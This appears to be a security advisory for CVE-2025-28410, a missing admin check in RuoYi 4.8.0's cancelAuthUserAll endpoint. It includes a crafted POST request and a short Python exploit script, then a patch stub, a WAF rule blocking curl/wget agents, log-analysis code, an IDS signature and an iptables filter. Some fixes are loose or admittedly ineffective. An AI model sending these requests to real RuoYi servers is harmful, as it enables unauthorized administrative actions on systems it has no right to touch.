How CVE-2025-28410 Works
The vulnerability exists in RuoYi v4.8.0’s `cancelAuthUserAll` method, which fails to verify administrative privileges before executing sensitive operations. Attackers can craft malicious requests to trigger this method, bypassing authorization checks. This allows unauthorized users to revoke all authentication sessions, including admin accounts, leading to privilege escalation. The flaw stems from improper session management and missing role validation in the backend controller.
Platform: RuoYi
Version: 4.8.0
Vulnerability: Privilege Escalation
Severity: Critical
Date: 04/09/2025
Exploitation
1. Craft Malicious Request:
POST /system/user/cancelAuthUserAll HTTP/1.1
Host: target.com
Content-Type: application/json

{"userId":"admin"}
2. Bypass Validation:
import requests

response = requests.post(
    "http://target.com/system/user/cancelAuthUserAll",
    json={"userId": "admin"},
    verify=False,
)
Protection
1. Patch:
// getCurrentUser() and UnauthorizedException stand in for the project's own
// user lookup and authorization exception; substitute the real ones.
@RequiresPermissions("system:user:resetPwd")
public void cancelAuthUserAll() {
    // Add admin role validation before any sensitive operation runs
    if (!getCurrentUser().isAdmin()) {
        throw new UnauthorizedException();
    }
}
2. WAF Rule:
location /system/user/ {
    # Note: this rejects every POST under /system/user/, including legitimate
    # administrative use; scope it to the vulnerable path if that is too broad.
    set $block 0;
    if ($request_method = POST) {
        set $block 1;
    }
    if ($block) {
        return 403;
    }
    if ($http_user_agent ~ "curl|wget") {
        return 403;
    }
}
Detection
1. Log Analysis:
grep -E "POST /system/user/cancelAuthUserAll" /var/log/nginx/access.log
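Going one step beyond the grep above, the following is an added example (not part of the advisory) that parses nginx combined-format access log lines, keeps the POSTs to the vulnerable endpoint, and summarises them per source IP by whether the server accepted (2xx) or rejected them. The log lines are constructed samples and the log format is assumed to be nginx "combined".

```python
import re
from collections import Counter

# Nginx "combined" log format (assumed; adjust the regex if your format differs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoint named in the advisory; query strings are stripped before matching.
VULN_PATH = "/system/user/cancelAuthUserAll"

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Apr/2025:10:01:02 +0000] "POST /system/user/cancelAuthUserAll HTTP/1.1" 200 54 "-" "python-requests/2.31"
203.0.113.7 - - [09/Apr/2025:10:01:03 +0000] "POST /system/user/cancelAuthUserAll HTTP/1.1" 200 54 "-" "python-requests/2.31"
198.51.100.4 - - [09/Apr/2025:10:02:00 +0000] "GET /system/user/list HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
192.0.2.9 - - [09/Apr/2025:10:03:11 +0000] "POST /system/user/cancelAuthUserAll?x=1 HTTP/1.1" 403 12 "-" "curl/8.0"
192.0.2.9 - - [09/Apr/2025:10:03:12 +0000] "GET /login HTTP/1.1" 200 902 "-" "curl/8.0"
"""

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # ignore query string
    rec["status"] = int(rec["status"])
    return rec

def find_cancel_auth_hits(log_text):
    """Return parsed POST requests to the vulnerable endpoint, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == VULN_PATH:
            hits.append(rec)
    return hits

def summarize(hits):
    """Per source IP, count hits the server accepted (2xx) versus rejected."""
    summary = {}
    for h in hits:
        key = "accepted" if 200 <= h["status"] < 300 else "rejected"
        summary.setdefault(h["ip"], Counter())[key] += 1
    return summary

if __name__ == "__main__":
    for ip, counts in summarize(find_cancel_auth_hits(SAMPLE_LOG)).items():
        print(ip, dict(counts))
```

An accepted (2xx) POST to this endpoint from a source that should not hold admin rights is the condition worth alerting on; rejected attempts still indicate probing.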
2. IDS Signature:
alert http any any -> any any (msg:"RuoYi CVE-2025-28410 Exploit"; flow:to_server; http.method; content:"POST"; http.uri; content:"/system/user/cancelAuthUserAll"; sid:1000001; rev:1;)
Mitigation
1. Disable Endpoint:
# Only affects a source checkout; a compiled and deployed RuoYi instance is not
# changed by this and will keep serving the endpoint until patched.
chmod 000 /path/to/RuoYi/system/user/controller.java
2. Network Isolation:
# String matching only works on plaintext HTTP (not TLS) and matches the
# string anywhere in the packet, so expect false positives and evasion via
# fragmentation; treat this as a stopgap, not a patch.
iptables -A INPUT -p tcp --dport 8080 -m string --string "cancelAuthUserAll" --algo bm -j DROP
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28410